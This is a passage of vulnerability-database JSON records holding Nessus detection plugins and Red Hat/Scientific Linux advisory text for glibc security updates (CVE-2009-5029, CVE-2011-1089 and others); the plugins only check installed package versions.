flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"nscd-2.3.4-2.57\")) flag++;\n\n\nif 
(flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-profile / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:46:22", "description": "The glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nIt was discovered that the glibc addmntent() function, used by various\nmount helper utilities, did not sanitize its input properly. A local\nattacker could possibly use this flaw to inject malformed lines into\nthe mtab (mounted file systems table) file via certain setuid mount\nhelpers, if the attacker were allowed to mount to an arbitrary\ndirectory under their control. (CVE-2010-0296)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. 
If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was discovered that the glibc fnmatch() function did not properly\nrestrict the use of alloca(). If the function was called on\nsufficiently large inputs, it could cause an application using\nfnmatch() to crash or, possibly, execute arbitrary code with the\nprivileges of the application. (CVE-2011-1071)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nIt was discovered that the locale command did not produce properly\nescaped output as required by the POSIX specification. If an attacker\nwere able to set the locale environment variables in the environment\nof a script that performed shell evaluation on the output of the\nlocale command, and that script were run with different privileges\nthan the attacker's, it could execute arbitrary code with the\nprivileges of the script. (CVE-2011-1095)\n\nAn integer overflow flaw was found in the glibc fnmatch() function. If\nan attacker supplied a long UTF-8 string to an application linked\nagainst glibc, it could cause the application to crash.\n(CVE-2011-1659)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. 
(CVE-2011-4609)\n\nThis update also fixes the following bug :\n\n - When using an nscd package that is a different version\n than the glibc package, the nscd service could fail to\n start. This update makes the nscd package require a\n specific glibc version to prevent this problem.\n\nUsers should upgrade to these updated packages, which resolve these\nissues.", "edition": 15, "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : glibc on SL4.x i386/x86_64 (20120213)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4609", "CVE-2010-0296", "CVE-2011-1659", "CVE-2010-0830", "CVE-2011-1071", "CVE-2011-1095", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "modified": "2012-08-01T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo-common", "p-cpe:/a:fermilab:scientific_linux:glibc", "p-cpe:/a:fermilab:scientific_linux:glibc-common", "p-cpe:/a:fermilab:scientific_linux:glibc-devel", "p-cpe:/a:fermilab:scientific_linux:glibc-profile", "p-cpe:/a:fermilab:scientific_linux:nscd", "p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:nptl-devel", "p-cpe:/a:fermilab:scientific_linux:glibc-utils", "p-cpe:/a:fermilab:scientific_linux:glibc-headers"], "id": "SL_20120213_GLIBC_ON_SL4_X.NASL", "href": "https://www.tenable.com/plugins/nessus/61243", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61243);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0296\", \"CVE-2010-0830\", \"CVE-2011-1071\", \"CVE-2011-1089\", \"CVE-2011-1095\", \"CVE-2011-4609\");\n\n script_name(english:\"Scientific Linux Security Update : glibc on 
SL4.x i386/x86_64 (20120213)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nIt was discovered that the glibc addmntent() function, used by various\nmount helper utilities, did not sanitize its input properly. A local\nattacker could possibly use this flaw to inject malformed lines into\nthe mtab (mounted file systems table) file via certain setuid mount\nhelpers, if the attacker were allowed to mount to an arbitrary\ndirectory under their control. (CVE-2010-0296)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. 
(CVE-2010-0830)\n\nIt was discovered that the glibc fnmatch() function did not properly\nrestrict the use of alloca(). If the function was called on\nsufficiently large inputs, it could cause an application using\nfnmatch() to crash or, possibly, execute arbitrary code with the\nprivileges of the application. (CVE-2011-1071)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nIt was discovered that the locale command did not produce properly\nescaped output as required by the POSIX specification. If an attacker\nwere able to set the locale environment variables in the environment\nof a script that performed shell evaluation on the output of the\nlocale command, and that script were run with different privileges\nthan the attacker's, it could execute arbitrary code with the\nprivileges of the script. (CVE-2011-1095)\n\nAn integer overflow flaw was found in the glibc fnmatch() function. If\nan attacker supplied a long UTF-8 string to an application linked\nagainst glibc, it could cause the application to crash.\n(CVE-2011-1659)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nThis update also fixes the following bug :\n\n - When using an nscd package that is a different version\n than the glibc package, the nscd service could fail to\n start. 
This update makes the nscd package require a\n specific glibc version to prevent this problem.\n\nUsers should upgrade to these updated packages, which resolve these\nissues.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1202&L=scientific-linux-errata&T=0&P=2559\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c13b3468\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:nptl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n 
script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 4.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL4\", reference:\"glibc-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"glibc-common-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"glibc-debuginfo-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"glibc-debuginfo-common-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"glibc-devel-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"glibc-headers-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"glibc-profile-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"glibc-utils-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"nptl-devel-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"nscd-2.3.4-2.57\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:10:23", "description": "Updated glibc packages that fix multiple security issues and one bug\nare now available for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. 
Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nIt was discovered that the glibc addmntent() function, used by various\nmount helper utilities, did not sanitize its input properly. A local\nattacker could possibly use this flaw to inject malformed lines into\nthe mtab (mounted file systems table) file via certain setuid mount\nhelpers, if the attacker were allowed to mount to an arbitrary\ndirectory under their control. (CVE-2010-0296)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was discovered that the glibc fnmatch() function did not properly\nrestrict the use of alloca(). 
If the function was called on\nsufficiently large inputs, it could cause an application using\nfnmatch() to crash or, possibly, execute arbitrary code with the\nprivileges of the application. (CVE-2011-1071)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nIt was discovered that the locale command did not produce properly\nescaped output as required by the POSIX specification. If an attacker\nwere able to set the locale environment variables in the environment\nof a script that performed shell evaluation on the output of the\nlocale command, and that script were run with different privileges\nthan the attacker's, it could execute arbitrary code with the\nprivileges of the script. (CVE-2011-1095)\n\nAn integer overflow flaw was found in the glibc fnmatch() function. If\nan attacker supplied a long UTF-8 string to an application linked\nagainst glibc, it could cause the application to crash.\n(CVE-2011-1659)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The\nUbuntu Security Team acknowledges Dan Rosenberg as the original\nreporter of CVE-2010-0830.\n\nThis update also fixes the following bug :\n\n* When using an nscd package that is a different version than the\nglibc package, the nscd service could fail to start. 
This update makes\nthe nscd package require a specific glibc version to prevent this\nproblem. (BZ#657009)\n\nUsers should upgrade to these updated packages, which resolve these\nissues.", "edition": 21, "published": "2012-02-14T00:00:00", "title": "RHEL 4 : glibc (RHSA-2012:0125)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4609", "CVE-2010-0296", "CVE-2011-1659", "CVE-2010-0830", "CVE-2011-1071", "CVE-2011-1095", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "modified": "2012-02-14T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:4", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", "p-cpe:/a:redhat:enterprise_linux:nptl-devel", "p-cpe:/a:redhat:enterprise_linux:glibc", "p-cpe:/a:redhat:enterprise_linux:glibc-common", "p-cpe:/a:redhat:enterprise_linux:glibc-devel", "p-cpe:/a:redhat:enterprise_linux:nscd", "p-cpe:/a:redhat:enterprise_linux:glibc-profile", "p-cpe:/a:redhat:enterprise_linux:glibc-headers"], "id": "REDHAT-RHSA-2012-0125.NASL", "href": "https://www.tenable.com/plugins/nessus/57928", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0125. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57928);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0296\", \"CVE-2010-0830\", \"CVE-2011-1071\", \"CVE-2011-1089\", \"CVE-2011-1095\", \"CVE-2011-1659\", \"CVE-2011-4609\");\n script_bugtraq_id(40063, 46563, 46740, 47370, 50898, 51439);\n script_xref(name:\"RHSA\", value:\"2012:0125\");\n\n script_name(english:\"RHEL 4 : glibc (RHSA-2012:0125)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix multiple security issues and one bug\nare now available for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. 
(CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nIt was discovered that the glibc addmntent() function, used by various\nmount helper utilities, did not sanitize its input properly. A local\nattacker could possibly use this flaw to inject malformed lines into\nthe mtab (mounted file systems table) file via certain setuid mount\nhelpers, if the attacker were allowed to mount to an arbitrary\ndirectory under their control. (CVE-2010-0296)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was discovered that the glibc fnmatch() function did not properly\nrestrict the use of alloca(). If the function was called on\nsufficiently large inputs, it could cause an application using\nfnmatch() to crash or, possibly, execute arbitrary code with the\nprivileges of the application. (CVE-2011-1071)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nIt was discovered that the locale command did not produce properly\nescaped output as required by the POSIX specification. 
If an attacker\nwere able to set the locale environment variables in the environment\nof a script that performed shell evaluation on the output of the\nlocale command, and that script were run with different privileges\nthan the attacker's, it could execute arbitrary code with the\nprivileges of the script. (CVE-2011-1095)\n\nAn integer overflow flaw was found in the glibc fnmatch() function. If\nan attacker supplied a long UTF-8 string to an application linked\nagainst glibc, it could cause the application to crash.\n(CVE-2011-1659)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The\nUbuntu Security Team acknowledges Dan Rosenberg as the original\nreporter of CVE-2010-0830.\n\nThis update also fixes the following bug :\n\n* When using an nscd package that is a different version than the\nglibc package, the nscd service could fail to start. This update makes\nthe nscd package require a specific glibc version to prevent this\nproblem. 
(BZ#657009)\n\nUsers should upgrade to these updated packages, which resolve these\nissues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2012:0125\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-1095\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-0296\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-1071\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-1659\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-1089\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-5064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-5029\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-4609\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-0830\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nptl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2012:0125\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", reference:\"glibc-2.3.4-2.57\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"glibc-common-2.3.4-2.57\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"glibc-devel-2.3.4-2.57\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"glibc-headers-2.3.4-2.57\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"glibc-profile-2.3.4-2.57\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"glibc-utils-2.3.4-2.57\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"nptl-devel-2.3.4-2.57\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"nscd-2.3.4-2.57\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-profile / etc\");\n }\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, 
{"lastseen": "2021-01-17T13:46:12", "description": "The glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nThis update also fixes several bugs and adds various enhancements.\n\nUsers are advised to upgrade to these updated glibc packages, which\ncontain backported patches to resolve these issues and add these\nenhancements.", "edition": 24, "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : glibc on SL6.x i386/x86_64", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1089", "CVE-2009-5064"], "modified": "2012-08-01T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20111206_GLIBC_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/61187", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61187);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-5064\", \"CVE-2011-1089\");\n\n script_name(english:\"Scientific Linux Security Update : glibc on SL6.x 
